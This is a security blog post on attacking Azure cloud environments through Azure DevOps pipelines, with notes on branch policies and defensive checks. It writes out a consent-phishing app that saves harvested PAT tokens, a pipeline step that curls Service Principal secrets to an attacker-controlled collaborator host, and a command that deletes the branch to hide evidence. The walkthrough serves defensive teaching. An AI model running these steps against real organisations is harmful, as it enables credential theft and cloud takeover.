Performing and Preventing Attacks on Azure Cloud Environments through Azure DevOps

By Matthew Lucas on 5 April, 2022

Many organisations have recognised the risk of assigning cloud engineers direct privileges to their production Azure Cloud resources.

With Owner or Contributor privileges assigned to an engineer’s day-to-day Azure Active Directory (Azure AD) account, an attacker capable of compromising such an account can gain total control over the relevant cloud resources, and act with total impunity.

As a result, organisations have begun abstracting control of resources away from human users to service accounts, intended only for use by CI/CD pipelines. This introduces a level of traceability and accountability to any changes within an organisation’s Azure environment. Rather than making an ad-hoc malicious change to deployed resources or creating new ones, an attacker would need to announce their intentions to the entire engineering team through visible changes to infrastructure-as-code (IaC) templates. In this sense, although the use of Azure DevOps does not remove excessive privilege altogether, it can provide a better way to manage those privileges and control access.

A clear question that arises from this line of thought is whether Azure DevOps can be an appropriate gatekeeper to these privileges. A malicious actor with a stolen developer account will now seek to attack Azure DevOps as a potential stepping stone to the organisation's Azure estate. As we will shortly observe, the effectiveness of Azure DevOps in this gatekeeper role largely depends on its configuration. In an optimal scenario, effective checks and the implementation of security controls that prevent certain developer actions can mitigate many attack scenarios. However, in a worst-case scenario, a poorly configured Azure DevOps project simply adds minor complexity to an attack path, whilst providing an attacker with even more discretion than a direct approach.

Attacker Aims

Within Azure DevOps, Azure Cloud resources are both deployed and managed through code run on pipeline agents, which can be either self-hosted servers or virtual machines managed by Azure. This code is held within Azure Repos as a YAML file, typically called "azure-pipelines.yml" and held within the repository root directory. Due to the nature of the deployment pipeline, control over the contents of this file would allow an attacker to execute arbitrary code on the pipeline agent during the deployment process. This provides access to the pipeline agent machine, and effective control over the cloud environment the pipeline is building.

There is a variety of possible malicious activities an attacker can perform once they’re in a position to execute code on the pipeline. If they’ve taken control of a self-hosted agent with a connection to more of an organisation’s infrastructure, either on-premise or in the cloud, this can be used as a pivot to perform further lateral movement. If the agent is Azure-managed, the possible scenarios primarily concern targeting the Azure Cloud environment being built. For the purposes of this blog post, we will be focusing entirely on Azure-managed agents, as on-premise deployments and their attack surfaces can vary drastically. The scenario we will focus on will involve an attacker targeting a specific set of Azure resources deployed through Azure DevOps. For the sake of this example, our ‘finish line’ will be the ability to steal data from databases and storage accounts, as well as spin up virtual machines to mine cryptocurrency.



Inspired by this blog post written not by a security professional but a frustrated developer, we will aim to achieve persistent access to an Azure Cloud environment by exfiltrating Service Principal credentials from a pipeline. Service Principals are essentially machine accounts within Azure AD, which can have assigned privileges to both Azure AD and Azure resources. Service Principals can also have assigned secret credentials to allow interactive logins. Importantly, Conditional Access policies for restricting Service Principal logins are currently in public preview and not widely adopted, so in many cases attackers are free to abuse their credentials from anywhere on the internet. At a high level, the attack can be summarised with the following diagram:

Attack Positioning

Before we begin discussing the potential activities performed once an attacker is in Azure DevOps, it is beneficial to take a brief look at how an attacker may gain initial access to Azure DevOps. For the attack scenarios we will discuss, the minimum access we require is the right to commit to Azure DevOps repositories and to run Azure DevOps pipelines. The two methods of authentication we are interested in for our attack scenario are:

- Valid credentials to the Azure DevOps web portal

- Highly privileged PAT token

Full Web Portal Access

If an attacker gains access to a developer's user account credentials, the ability to interact with the Azure DevOps web portal would be of particular interest to them. This would grant them the ability to interact with any of the developer’s repositories, including commits, branches, and pull requests, along with the ability to create pipeline runs. This method of access would be sufficient to plant malicious code in a repository and would be simple for an attacker to navigate.

The difficulty an attacker would face when accessing the web portal depends on the existing foothold they possess, along with the effectiveness of an organisation’s Conditional Access policies. For example, an attacker with some form of stolen credentials may be able to simply log into the web portal from their own machine. However, in many cases, this will be blocked due to an unexpected IP address – or at least, trigger a multi-factor authentication (MFA) prompt. In most organisations, this should sufficiently complicate any attack path involving Azure DevOps to the point where other modes of authentication would become of interest.

Privileged PAT Token

Personal Access Tokens (PAT tokens) are tokens used to authenticate actions within and surrounding repositories. These are supported in various CI/CD platforms including Azure DevOps. In particular, they can be used to authenticate Git commits to Azure Repos as well as to log in to the Azure DevOps CLI. Whilst they are always tied to a specific Azure AD account with access in Azure DevOps, they do not necessarily inherit all of that account’s privileges. Since they are commonly used in automation within Azure DevOps, it is not always necessary nor wise to provision these with the full rights of a particular user, and a subset can be selected at the point of generation.

In our attack scenario, we aim to both commit malicious code to a repository and subsequently run a pipeline to execute this code. The ability to commit to a Git repository, such as through a developer SSH key, allows the introduction of malicious code but does not necessarily trigger a corresponding pipeline. Similarly, the ability to execute a pipeline, such as through the Azure DevOps CLI, does not inherently allow a user to alter code in a repository. As PAT tokens can be used both for authenticating Git commits and interacting with the Azure DevOps CLI, a sufficiently privileged token can be used for both of these stages in an attack.
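To make the two-stage requirement concrete, the following is a minimal sketch of how a defender might assess which stages a leaked token would enable. The scope names are believed to correspond to Azure DevOps PAT scopes but should be treated as assumptions and checked against current documentation; the function name and return shape are hypothetical.

```python
# Assumed scope names; verify against the Azure DevOps scope documentation.
CODE_WRITE_SCOPES = {"vso.code_write", "vso.code_manage", "app_token"}
BUILD_EXECUTE_SCOPES = {"vso.build_execute", "app_token"}


def stages_enabled(token_scopes):
    """Report which stages of the commit-then-run path a token's scopes allow."""
    scopes = set(token_scopes)
    can_commit = bool(scopes & CODE_WRITE_SCOPES)
    can_run = bool(scopes & BUILD_EXECUTE_SCOPES)
    return {
        "commit": can_commit,
        "run_pipeline": can_run,
        # Both stages are needed for the scenario described in this post.
        "full_path": can_commit and can_run,
    }
```

A token limited to code write access would report `full_path` as false, which is the outcome that scoping tokens narrowly at generation time aims for.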

The scenarios in which an attacker could steal a PAT token vary depending on the context of the organisation's code deployments and repository secret management. For instance, if they are used in an automation script and left hard-coded, the PAT token and its associated privileges would be available to a studious attacker with access to the relevant repository. Additionally, if used for authentication to Azure DevOps CLI, these may be cached on disk in a user's ".azure" folder. These can be found in the following locations depending on the operating system:

~/.azure on Linux

%USERPROFILE%\.azure on Windows
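As an illustration of how easily hard-coded or cached tokens can be located, here is a rough sketch of a scanner that a defender could run over scripts or configuration files. It assumes the classic token format of 52 lowercase base32 characters; newer token formats may be longer, so the pattern is an assumption rather than a definitive signature, and the function name is hypothetical.

```python
import re

# Assumption: classic Azure DevOps PATs are 52 characters drawn from a-z and 2-7.
CANDIDATE_PAT = re.compile(r"\b[a-z2-7]{52}\b")


def find_candidate_pats(text):
    """Return (line_number, masked_token) pairs for strings that look like PATs."""
    hits = []
    for line_number, line in enumerate(text.splitlines(), start=1):
        for match in CANDIDATE_PAT.finditer(line):
            # Mask the value so the scanner's own output does not leak the secret.
            hits.append((line_number, match.group()[:4] + "***"))
    return hits
```

Pattern matching of this kind will produce false positives (any 52-character base32 string matches), so hits are best treated as prompts for manual review.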



Finally, if an attacker cannot discover existing PATs, then these can be generated using an appropriately privileged Azure Active Directory enterprise application. This approach requires an attacker to be able to register such applications and acquire consent from a user with the desired permissions within Azure DevOps.

Protection within Azure DevOps

Access to Azure DevOps through user credentials and PAT tokens can grant an attacker significant access to an organisation’s code and pipelines. Fortunately, there are various security mechanisms within Azure DevOps that can prevent this access from leading to malicious code running in the pipelines.

One of the primary security benefits of Azure DevOps over deploying resources directly from the Portal or CLI is that it enables code review. This adds a layer of accountability to changes in an environment. "Branch Policies" are the primary way of enforcing code review for pushes to specific branches. These can enforce a variety of requirements on commits to a specified branch, such as requiring all comments to be resolved or approval from specific Azure DevOps users. Rather than pushing code directly into a branch, branch policies can require that a pull request is created and approved. It is common to see an approval policy enabled on the main branch in a repository, but it is rarely seen on feature branches. This is often necessary, as an organisation needs its developers to be able to write and test their code before pushing to the main branch. However, if all branches have access to the same pipeline, then the potential for damage to the resulting cloud environment can be ultimately the same. Whilst an attacker may only be able to modify code in a feature branch, the code would be running with sufficient privileges to alter the production environment.

As an additional layer of protection, Azure DevOps also allows the enforcement of pipeline approval. If an organisation is using environments, it is possible to enforce approval at the pipeline run stage as well. When used properly, this control can ensure that pipeline runs have been reviewed by another member of the team, including code run from feature branches. There is an additional option to prevent pipeline runs from branches without branch policies. However, it should be noted that this only checks that branch policies of any type have been enabled, not that the full configuration of the branch policies is to a high standard.

The specific configuration of the branch policies is important because an ineffective configuration simply acts as a complication rather than a prevention mechanism. For instance, if a branch review requires only one reviewer and enables self-approval, then the review process can be trivially initiated and concluded by an attacker. This same option could be present on pipeline approvals, allowing an attacker to simply approve their own runs if enabled.
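The point about ineffective configurations can be sketched as a simple audit function. The dictionary keys below are loosely modelled on the settings of a minimum-reviewer policy and are assumptions for illustration; the real policy payload may be shaped differently, and the function name is hypothetical.

```python
def weak_review_findings(policy):
    """Return reasons why a review policy would not stop a single compromised account."""
    findings = []
    if not policy.get("isEnabled", False):
        findings.append("policy is disabled")
    if not policy.get("isBlocking", False):
        findings.append("policy is advisory only")
    if policy.get("minimumApproverCount", 0) < 1:
        findings.append("no approvals required")
    if policy.get("creatorVoteCounts", False):
        # Self-approval lets the author open and complete the review alone.
        findings.append("author can approve their own change")
    return findings
```

An empty result only means that none of these specific weaknesses were found; it is not evidence that the policy is strong overall.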

So far, both discussed security controls involve getting a trusted individual to review any code before it reaches a pipeline. This is a good illustration of the trade-off between security and usability that many organisations face. Each level of review added for security purposes inevitably slows down the process of testing and creating new features and fixes. Whilst review should certainly be enforced for production environments, it could reasonably be argued to be an unnecessary step for development environments. If the decision is made to free up development workflows, it is important that these are kept as separate from production as possible, whether that’s a separate project or an entirely separate Azure DevOps organisation.

Additionally, even if production data is protected, an unrestricted development environment may still enable certain attack scenarios. For instance, if an attacker simply wanted to mine cryptocurrency at no cost to themselves, there is no reason they cannot do this in a development environment. Furthermore, if development virtual machines have functional networking with other parts of an organisation's infrastructure, these could also be used as a stepping stone to further lateral movement on the network.

For our attack scenario, we will emulate a relatively typical setup by enabling branch policies that would require one approval for pushes to the main branch of every repository of the organisation. For simplicity's sake, we will exclude pipeline approval and not explore the dangers of self-approval in depth.

End-to-End Attack Scenario

Now that we have some background on what an attacker needs to target an Azure DevOps Pipeline and some of the common protections that they might have to evade, we can start exploring a demonstrative attack path. This attack will start from the position of an ordinary user within Azure Active Directory with no current access to any Azure DevOps organisations, including the one that we wish to target. This could be an attacker with an initial foothold inside Azure Active Directory, or an insider threat. The attack path will then proceed according to the following:

We will demonstrate the method of gaining access to an Azure DevOps organisation through phishing a PAT token, and then using this stolen PAT token to compromise a pipeline. Using our control of a pipeline, we will steal valid Service Principal credentials and use them to authenticate to the relevant Azure subscription. In part two of the blog, we will explore the detection opportunities that each step of this attack path process produces.

Enumerating Azure DevOps Organisations

Before an attacker can target an Azure DevOps organisation, they first need to know what DevOps organisations are backed by their target Azure Active Directory. Azure DevOps allows any Azure DevOps organisation members to export the full list of organisations backed by their Azure Active Directory tenant, and we can use this functionality in our attack path. From a browser logged into their initial compromised Azure AD user, all an attacker needs to do is navigate to https://dev.azure.com and either browse their existing organisations or create a new one.

From this stage, navigating to the "Organisation Settings" -> "Azure Active Directory" produces a handy list of Azure DevOps organisations along with their owners. An example can be seen below:

    Organization Id, Organization Name, Url, Owner, Exception Type, Error Message
    [REDACTED], devopsattacks, https://dev.azure.com/devopsattacks/, matthew.lucas@[REDACTED].onmicrosoft.com, ,

To proceed with our PAT phishing technique, an attacker would also need to identify a developer likely to have commit access to repositories and the right to run pipelines. The organisation owner can act as this target, or can serve as a starting point for an attacker to perform further investigation of other internal documentation hosted in services such as Confluence, Microsoft SharePoint or others that might reveal other senior team members.
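The exported list shown above is plain comma-separated text, so reviewing it (for example, to audit which organisations and owners are visible to every tenant member) takes very little effort. A minimal sketch follows, assuming the column names match the header row shown; the function name is hypothetical.

```python
import csv
import io


def parse_org_export(text):
    """Return (name, url, owner) tuples from the organisation export text."""
    # skipinitialspace handles the space that follows each comma in the export.
    reader = csv.DictReader(io.StringIO(text), skipinitialspace=True)
    rows = []
    for row in reader:
        rows.append((
            (row.get("Organization Name") or "").strip(),
            (row.get("Url") or "").strip(),
            (row.get("Owner") or "").strip(),
        ))
    return rows
```

The same output that helps an attacker choose a target can help an administrator spot unexpected organisations connected to the tenant.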

Phishing a PAT

Of all the ADO authentication methods available to an attacker, PAT tokens are one of the more practical due to their broad utility. There are various methods by which an attacker can acquire this material, such as by discovering them in a public repository or in a user’s ".azure" folder. Rather than exploring these passive methods, we will explore a more active method by which an attacker can generate these through a targeted internal phish.



Microsoft provides an API for the management of PAT tokens. In order to use this API and create PAT tokens, we would require a valid Azure AD token for the target user. These can be generated for a user by Azure AD applications which the user has consented to. Microsoft has fortunately provided instructions and example code here for creating such an app. Whilst the intention of the example app is broadly to allow users to manage their PAT tokens, we can equally use it as an attacker to generate PAT tokens for ourselves in the context of a phished user. The high-level process is to create an Azure AD App Registration, host an app that liaises with the PAT token management API, phish a targeted developer, and have them consent to letting our app manage PAT tokens on their behalf. This general process is called consent phishing and can be more universally used for other lateral movement techniques within Azure Active Directory.

To begin the process of consent phishing, we must register this application within our target Azure Active Directory tenant. By default, any user can register a new application within a tenant, so assuming this setting has not been disabled, we can use our initial compromised user for this purpose.



For demonstration purposes, we can use Microsoft’s example Flask application for generating PAT tokens, accessible here. This has been adapted very slightly to output any generated PAT tokens to a file on the server, with three lines added to the "pat_post" function:

    @app.route("/pat_post", methods=["GET"])
    def pat_post():
        token = _get_token_from_cache(app_config.SCOPE)
        if not token:
            return redirect(url_for("login"))
        requestBody = {}
        if session["displayname"] != "":
            requestBody["displayName"] = session["displayname"]
        if session["scope"] != "":
            requestBody["scope"] = session["scope"]
        if session["validto"] != "":
            requestBody["validTo"] = session["validto"]
        if session["allorgs"] != "":
            requestBody["allOrgs"] = session["allorgs"]
        pat_data = requests.post(  # Use token to call downstream service
            app_config.ENDPOINT,
            headers={'Authorization': 'Bearer ' + token['access_token'], 'Content-type': 'application/json'},
            data=json.dumps(requestBody)
        ).json()
        pat_writing = open("pat-output.txt", "w+")
        pat_writing.write(str(pat_data))
        pat_writing.close()
        return render_template('display.html', result=pat_data)

As described in the MSFT tutorial, once the application registration has been done in Azure AD, we can assign it "user_impersonation" API privileges to Azure DevOps which would allow it to act on behalf of the consented user. For demonstration, we will be hosting the application locally. To genuinely carry out the consent phish, the application must be hosted on a convincing domain, with the redirect URL adapted accordingly.

Once the application is registered and possesses the proper API permissions, we can now send a link to our target developer with some convincing phishing pretext. They will have to click ‘Consent’ to Azure DevOps impersonation privileges and will later also receive an email from Azure DevOps about their newly generated PAT token. As such, any pretext will have to be particularly convincing to avoid arousing suspicion.

As can be seen in the screenshot below, this app by default doesn’t hide its purpose. In this scenario, where we are both attacker and target, we simply click through to generate our token. In a real attack scenario, it would be relatively trivial to adapt this page to provide a more convincing context. As many organisations rely increasingly on Azure AD for SSO with internal apps, an attacker could simply clone an existing internal app or mask theirs as an Azure DevOps productivity tool.

In the example application, clicking “Submit Query” on the “Call PAT create token” form creates a long-lived PAT token with full access to all scopes belonging to the target user within the target organisation.
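The properties that make such a token valuable (full scope, long lifetime, validity across organisations) are also the ones an organisation can choose to restrict. The sketch below checks a token creation request against a hypothetical policy. The field names mirror the request body used by the example application, while the full-access scope value and the 30-day limit are assumptions for illustration.

```python
from datetime import datetime, timedelta, timezone

FULL_ACCESS_SCOPE = "app_token"  # assumed value representing a full-scoped token


def pat_request_findings(body, now, max_lifetime_days=30):
    """Return reasons a PAT creation request would breach a restrictive policy."""
    findings = []
    if body.get("scope") == FULL_ACCESS_SCOPE:
        findings.append("full-access scope requested")
    if body.get("allOrgs"):
        findings.append("token valid for all organisations")
    valid_to = body.get("validTo")
    if valid_to:
        # Accept a trailing "Z" for UTC, which older Python versions do not parse.
        expiry = datetime.fromisoformat(valid_to.replace("Z", "+00:00"))
        if expiry.tzinfo is None:
            expiry = expiry.replace(tzinfo=timezone.utc)
        if expiry - now > timedelta(days=max_lifetime_days):
            findings.append("lifetime exceeds policy maximum")
    return findings
```

The `now` argument is expected to be timezone-aware, for example `datetime.now(timezone.utc)`.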

With this PAT token and knowledge of the Azure DevOps organisation, we can log in to the Azure DevOps CLI with the following command:

    az devops login --organization $org
    Token:

Enumeration of ADO

Now that we have our foothold within the Azure DevOps organisation, we can begin to look for repos that we can edit and the associated pipelines. Firstly, we start by listing projects using the following:

    az devops project list --organization=$org

Once we have a project, saved in $proj, we enumerate this for repos:

    az repos list --organization=$org --project=$proj

And then their respective pipelines:

    az pipelines list --organization $org --project $proj

In a test environment, I have set up the organisation "https://dev.azure.com/devopsattacks" with a project, repo, and pipeline all named "incomplete-branch-protection". The utility of the PAT token is that as well as acting as authentication to the Azure DevOps CLI, it can also be used as authentication for any and all "git" commands used to interact with Azure DevOps Repos. Once we have identified a repo of interest, we can clone it as follows:

    MY_PAT=[REDACTED]
    B64_PAT=$(printf "%s"":$MY_PAT" | base64)
    git -c http.extraHeader="Authorization: Basic ${B64_PAT}" clone https://dev.azure.com/devopsattacks/incomplete-branch-protection/_git/incomplete-branch-protection

Targeting the Pipeline

As discussed earlier, in this example, we only have enforced branch policies on the main branch of every repository, but not on any other feature branches. This is a relatively common setup since developers need to be able to work on feature branches and test their code.

For use in our example, we have an initial "azure-pipelines.yml" file that defines an illustrative simple pipeline deployment as follows:

    # Starter pipeline
    # Start with a minimal pipeline that you can customize to build and deploy your code.
    # Add steps that build, run tests, deploy, and more:
    # https://aka.ms/yaml

    trigger:
    - master

    pool:
      name: Default

    steps:
    - task: AzureResourceManagerTemplateDeployment@3
      inputs:
        deploymentScope: 'Resource Group'
        azureResourceManagerConnection: 'sp-devops-logging-test'
        subscriptionId: '[REDACTED]'
        action: 'Create Or Update Resource Group'
        resourceGroupName: 'devops-logging-tests-pipeline-target'
        location: 'UK West'
        templateLocation: 'Linked artifact'
        csmFile: 'azuredeploy.json'
        overrideParameters: '-projectName incomplete-branch-protection'
        deploymentMode: 'Incremental'
        deploymentName: 'DeployPipelineTemplate'

This pipeline is minimally adapted from a Microsoft starter pipeline and is in fact invalid and does not successfully build any resources. This will not matter for our use case since we are going to add malicious instructions before the erroneous legitimate ones.

To perform our attack on the build agent, we simply edit our pipeline to include code that exfiltrates Service Principal credentials to an awaiting Burp Collaborator server:

    # Starter pipeline
    # Start with a minimal pipeline that you can customize to build and deploy your code.
    # Add steps that build, run tests, deploy, and more:
    # https://aka.ms/yaml

    trigger:
    - master

    pool:
      name: Default

    steps:
    - task: AzureCLI@2
      inputs:
        azureSubscription: 'sp-devops-logging-test'
        scriptType: 'bash'
        scriptLocation: 'inlineScript'
        inlineScript: |
          curl https://[REDACTED].burp.[REDACTED]/$servicePrincipalId
          curl https://[REDACTED].burp.[REDACTED]/$servicePrincipalKey
          curl https://[REDACTED].burp.[REDACTED]/$tenantId
        addSpnToEnvironment: true
    - task: AzureResourceManagerTemplateDeployment@3
      inputs:
        deploymentScope: 'Resource Group'
        azureResourceManagerConnection: 'sp-devops-logging-test'
        subscriptionId: '[REDACTED]'
        action: 'Create Or Update Resource Group'
        resourceGroupName: 'devops-logging-tests-pipeline-target'
        location: 'UK West'
        templateLocation: 'Linked artifact'
        csmFile: 'azuredeploy.json'
        overrideParameters: '-projectName incomplete-branch-protection'
        deploymentMode: 'Incremental'
        deploymentName: 'DeployPipelineTemplate'

In order to push this code to Azure DevOps, we need to create a new branch. This way, we can avoid having to create a pull request and getting approval. As before, this is done through standard "git" commands:

    git checkout -b malicious-branch
    git add *
    git commit -m 'boring commit'
    git -c http.extraHeader="Authorization: Basic ${B64_PAT}" push origin malicious-branch

With our malicious pipeline code committed and pushed, we now return to the Azure DevOps CLI to run the pipeline:

    az pipelines run --branch malicious-branch --name $pipeline --project $proj

Successful completion of this run returns the relevant credentials to the attacker-controlled server. With these, we can now log in as the Service Principal from any machine. As noted earlier, Conditional Access is currently in public preview for Service Principals and for this example has not been enforced:

    az login --service-principal -u $servicePrincipalId -p $servicePrincipalKey -t $tenantId

Typically, the Service Principals used in Azure Pipelines are of particularly high privilege. To a certain extent, this is a necessity as they need to be able to deploy and remove a huge variety of Azure resources constantly. They will typically possess at least "Contributor" or "Owner" rights to the subscription they build resources in. Unfortunately, this means that an attacker with access to them would also have sufficient privileges to target Azure Storage Accounts for sensitive data or create virtual machines to mine cryptocurrency. These privileges could also be used to execute code on virtual machines within the target subscription, such as to target applications or workloads used by an organisation’s clients.
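Because the exfiltration step in the modified pipeline depends on the Azure CLI task exposing the Service Principal secret through "addSpnToEnvironment", a reviewer or pre-merge check could flag pipeline definitions that combine that setting with network commands referencing the secret variables. The following is a rough text-based sketch under that assumption; it does not parse YAML properly, the list of network commands is illustrative, and the function name is hypothetical.

```python
import re

SECRET_VARS = ("servicePrincipalKey", "servicePrincipalId", "tenantId")
NETWORK_COMMAND = re.compile(r"\b(curl|wget|Invoke-WebRequest)\b", re.IGNORECASE)
SPN_EXPOSED = re.compile(r"^\s*addSpnToEnvironment:\s*true\s*$", re.IGNORECASE | re.MULTILINE)


def flag_pipeline(yaml_text):
    """Return human-readable findings for a pipeline definition given as text."""
    findings = []
    if SPN_EXPOSED.search(yaml_text):
        findings.append("addSpnToEnvironment is enabled")
    for line_number, line in enumerate(yaml_text.splitlines(), start=1):
        if not NETWORK_COMMAND.search(line):
            continue
        for name in SECRET_VARS:
            if name in line:
                findings.append(f"line {line_number}: network command references {name}")
    return findings
```

A check like this is easy to evade (for example, by encoding the variable names), so it complements human review rather than replacing it.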

Whilst the extraction of Service Principal credentials is also useful for maintaining persistent access to the cloud environment, it is not the only possible outcome of targeting a pipeline. For example, if an attacker recognises that an organisation has strict monitoring of Service Principal logins but does not monitor pipeline runs, they could opt to perform all of their subsequent attacks on Azure resources within pipeline code. Additionally, if a Service Principal possesses Owner privileges to a subscription, an attacker could abuse this to assign their initial compromised account this level of privilege, and continue operating from this account.

Cleaning up after ourselves

Assuming the attacker decided to abuse Service Principal credentials through an interactive login, let us explore ways in which they could hide some of the signs of attack. The two main pieces of evidence left behind within Azure DevOps are the malicious git branch and the log of the malicious pipeline run. Either of these would expose the malicious code run by the pipeline.

The git branch can be deleted through an additional git push:

    git -c http.extraHeader="Authorization: Basic ${B64_PAT}" push origin --delete malicious-branch

This effectively removes the record of malicious activity from Azure Repos, with branches only recoverable if the full exact branch name is known. However, logs of pipeline runs can reveal the output of any code that was run, in turn revealing clues as to the contents of the malicious code. These cannot be deleted with only CLI access, so they would remain intact in our particular attack scenario. However, these would be trivial to delete via the Azure DevOps web portal if an attacker has the correct permissions to the project.

Conclusion

In this blog, we have demonstrated a simple attack path by which an attacker with an unprivileged foothold in an Azure Active Directory tenant could pivot to control over production Azure resources via Azure DevOps. The steps here primarily consist of abusing legitimate functionality and access afforded to developers. This means that the majority of the mitigations within Azure DevOps involve enforcing code review at every turn to identify potential malicious code before it is committed. This inevitably reduces the speed at which cloud architects can develop and deploy, and organisations will have to identify the balance between efficiency and preventing harm from a compromised developer. Part two of this blog will identify and evaluate the detection opportunities arising from this attack path.